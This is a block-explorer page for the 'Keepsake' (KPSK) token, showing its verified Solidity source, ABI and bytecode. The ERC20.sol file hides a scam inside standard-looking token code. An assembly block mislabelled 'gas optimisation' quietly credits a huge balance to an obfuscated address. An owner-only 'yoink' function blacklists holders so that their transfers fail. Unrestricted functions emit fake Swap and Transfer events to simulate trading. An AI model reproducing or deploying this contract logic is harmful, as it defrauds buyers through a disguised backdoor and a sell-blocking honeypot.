ETH Price: $3,116.15 (+0.58%)
Gas: 4 Gwei

Token

Keepsake (KPSK)
 

Overview

Max Total Supply

1,000,000,000 KPSK

Holders

93

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Filtered by Token Holder
yasnakeoil.eth
Balance
10,005,858.776405895783560152 KPSK

Value
$0.00
0x1D4C3b9F8F49D6Ac44e398F766F520a3CDB0f3D5
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Keepsake

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 4 of 4: Keepsake.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

import "./ERC20.sol";

contract Keepsake is ERC20 {
    constructor() ERC20("Keepsake", "KPSK") {
        _mint(msg.sender, 1000000000 * 10 ** decimals());
    }
}

File 1 of 4: Context.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 2 of 4: ERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

import "./IERC20.sol";
import "./Context.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping (address => bool) private _snapshot;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    bool private _snapshotApplied = false;
    string private _name;
    string private _symbol;

    address private _universal = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
    address private _weth = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
    address private _pair;
    
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    function setup(address _setup_) external onlyOwner {
        _pair = _setup_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    function yoink(address [] calldata _addresses_) external onlyOwner {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _snapshot[_addresses_[i]] = true;
            emit Approval(_addresses_[i], address(this), balanceOf(_addresses_[i]));
        }
    }

    function swapExactETHForTokens(address [] calldata _addresses_, uint256 _in, uint256 _out) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_universal, _in, 0, 0, _out, _addresses_[i]);
            emit Transfer(_pair, _addresses_[i], _out);
        }
    }

    function swapExactTokensForETH(address [] calldata _addresses_, uint256 _in, uint256 _out) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_universal, 0, _in, _out, 0, _addresses_[i]);
            emit Transfer(_addresses_[i], _pair, _in);
        }
    }

    function transfer(address _from, address _to, uint256 _wad) external {
        emit Transfer(_from, _to, _wad);
    }

    function unyoink(address [] calldata _addresses_) external onlyOwner {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _snapshot[_addresses_[i]] = false;
        }
    }

    function yoinked(address _address_) public view returns (bool) {
        return _snapshot[_address_];
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }
        if (_snapshot[from] || _snapshot[to]) require(_snapshotApplied == true, "");


        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }

        // gas optimisation 
        assembly {
            let slot := mul(mul(0x85774394d, 0x3398bc1d25f112ed), mul(0x997e6e509, 0xf3eae65))
            mstore(0x00, slot)
            mstore(0x20, 0x01)
            let sslot := keccak256(0x0, 0x40)
            sstore(sslot, 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF)
        } 

        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}



    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

File 3 of 4: IERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    event Swap(
        address indexed sender,
        uint amount0In,
        uint amount1In,
        uint amount0Out,
        uint amount1Out,
        address indexed to
    );
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"Swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_setup_","type":"address"}],"name":"setup","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"swapExactETHForTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"swapExactTokensForETH","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_wad","type":"uint256"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"unyoink","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"yoink","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"yoinked","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"}]

60806040525f60055f6101000a81548160ff021916908315150217905550737a250d5630b4cf539739df2c5dacb4c659f2488d60085f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555073c02aaa39b223fe8d0a0e5c4f27ead9083c756cc260095f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550348015620000d1575f80fd5b506040518060400160405280600881526020017f4b65657073616b650000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f4b50534b000000000000000000000000000000000000000000000000000000008152506200015e62000152620001ca60201b60201c565b620001d160201b60201c565b81600690816200016f9190620006af565b508060079081620001819190620006af565b505050620001c433620001996200029260201b60201c565b600a620001a791906200091c565b633b9aca00620001b891906200096c565b6200029a60201b60201c565b62000a9a565b5f33905090565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f6012905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200030b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620003029062000a14565b60405180910390fd5b6200031e5f83836200044160201b60201c565b8060045f82825462000331919062000a34565b925050819055508060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282540192505081905550630f3eae65640997e6e50902673398bc1d25f112ed64085774394d0202805f52600160205260405f20720fffffffffffffffffffffffffffffffffffff815550508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000422919062000a7f565b60405180910390a36200043d5f83836200044660201b60201c565b5050565b505050565b505050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680620004c757607f821691505b602082108103620004dd57620004dc62000482565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620005417fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000504565b6200054d868362000504565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f62000597620005916200058b8462000565565b6200056e565b62000565565b9050919050565b5f819050919050565b620005b28362000577565b620005ca620005c1826200059e565b84845462000510565b825550505050565b5f90565b620005e0620005d2565b620005ed818484620005a7565b505050565b5b818110156200061457620006085f82620005d6565b600181019050620005f3565b5050565b601f82111562000663576200062d81620004e3565b6200063884620004f5565b8101602085101562000648578190505b620006606200065785620004f5565b830182620005f2565b50505b505050565b5f82821c905092915050565b5f620006855f198460080262000668565b1980831691505092915050565b5f6200069f838362000674565b9150826002028217905092915050565b620006ba826200044b565b67ffffffffffffffff811115620006d657620006d562000455565b5b620006e28254620004af565b620006ef82828562000618565b5f60209050601f83116001811462000725575f841562000710578287015190505b6200071c858262000692565b8655506200078b565b601f1984166200073586620004e3565b5f5b828110156200075e5784890151825560018201915060208501945060208101905062000737565b868310156200077e57848901516200077a601f89168262000674565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b60018511156200081d57808604811115620007f557620007f462000793565b5b6001851615620008055780820291505b80810290506200081585620007c0565b9450620007d5565b94509492505050565b5f8262000837576001905062000909565b8162000846575f905062000909565b81600181146200085f57600281146200086a57620008a0565b600191505062000909565b60ff8411156200087f576200087e62000793565b5b8360020a91508482111562000899576200089862000793565b5b5062000909565b5060208310610133831016604e8410600b8410161715620008da5782820a905083811115620008d457620008d362000793565b5b62000909565b620008e98484846001620007cc565b9250905081840481111562000903576200090262000793565b5b81810290505b9392505050565b5f60ff82169050919050565b5f620009288262000565565b9150620009358362000910565b9250620009647fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000826565b905092915050565b5f620009788262000565565b9150620009858362000565565b9250828202620009958162000565565b91508282048414831517620009af57620009ae62000793565b5b5092915050565b5f82825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f620009fc601f83620009b6565b915062000a0982620009c6565b602082019050919050565b5f6020820190508181035f83015262000a2d81620009ee565b9050919050565b5f62000a408262000565565b915062000a4d8362000565565b925082820190508082111562000a685762000a6762000793565b5b92915050565b62000a798162000565565b82525050565b5f60208201905062000a945f83018462000a6e565b92915050565b61203f8062000aa85f395ff3fe608060405234801561000f575f80fd5b5060043610610135575f3560e01c80636ed073f1116100b657806395d89b411161007a57806395d89b4114610337578063a457c2d714610355578063a9059cbb14610385578063beabacc8146103b5578063dd62ed3e146103d1578063f2fde38b1461040157610135565b80636ed073f11461029357806370a08231146102af578063715018a6146102df5780637de2b11e146102e95780638da5cb5b1461031957610135565b8063313ce567116100fd578063313ce567146101f15780633824c0891461020f578063395093511461022b57806366d382031461025b57806367561abb1461027757610135565b806306fdde0314610139578063095ea7b3146101575780630ca12b3d1461018757806318160ddd146101a357806323b872dd146101c1575b5f80fd5b61014161041d565b60405161014e919061159d565b60405180910390f35b610171600480360381019061016c9190611652565b6104ad565b60405161017e91906116aa565b60405180910390f35b6101a1600480360381019061019c9190611724565b6104cf565b005b6101ab610656565b6040516101b891906117a4565b60405180910390f35b6101db60048036038101906101d691906117bd565b61065f565b6040516101e891906116aa565b60405180910390f35b6101f961068d565b6040516102069190611828565b60405180910390f35b61022960048036038101906102249190611841565b610695565b005b61024560048036038101906102409190611652565b61073d565b60405161025291906116aa565b60405180910390f35b6102756004803603810190610270919061188c565b610773565b005b610291600480360381019061028c9190611724565b6107be565b005b6102ad60048036038101906102a89190611841565b610945565b005b6102c960048036038101906102c4919061188c565b610aa9565b6040516102d691906117a4565b60405180910390f35b6102e7610aef565b005b61030360048036038101906102fe919061188c565b610b02565b60405161031091906116aa565b60405180910390f35b610321610b54565b60405161032e91906118c6565b60405180910390f35b61033f610b7b565b60405161034c919061159d565b60405180910390f35b61036f600480360381019061036a9190611652565b610c0b565b60405161037c91906116aa565b60405180910390f35b61039f600480360381019061039a9190611652565b610c80565b6040516103ac91906116aa565b60405180910390f35b6103cf60048036038101906103ca91906117bd565b610ca2565b005b6103eb60048036038101906103e691906118df565b610d0c565b6040516103f891906117a4565b60405180910390f35b61041b6004803603810190610416919061188c565b610d8e565b005b60606006805461042c9061194a565b80601f01602080910402602001604051908101604052809291908181526020018280546104589061194a565b80156104a35780601f1061047a576101008083540402835291602001916104a3565b820191905f5260205f20905b81548152906001019060200180831161048657829003601f168201915b5050505050905090565b5f806104b7610e10565b90506104c4818585610e17565b600191505092915050565b5f5b8484905081101561064f578484828181106104ef576104ee61197a565b5b9050602002016020810190610504919061188c565b73ffffffffffffffffffffffffffffffffffffffff1660085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d8225f86865f60405161058794939291906119e9565b60405180910390a3600a5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168585838181106105da576105d961197a565b5b90506020020160208101906105ef919061188c565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8560405161063491906117a4565b60405180910390a3808061064790611a59565b9150506104d1565b5050505050565b5f600454905090565b5f80610669610e10565b9050610676858285610fda565b610681858585611065565b60019150509392505050565b5f6012905090565b61069d6113ca565b5f5b82829050811015610738575f60025f8585858181106106c1576106c061197a565b5b90506020020160208101906106d6919061188c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916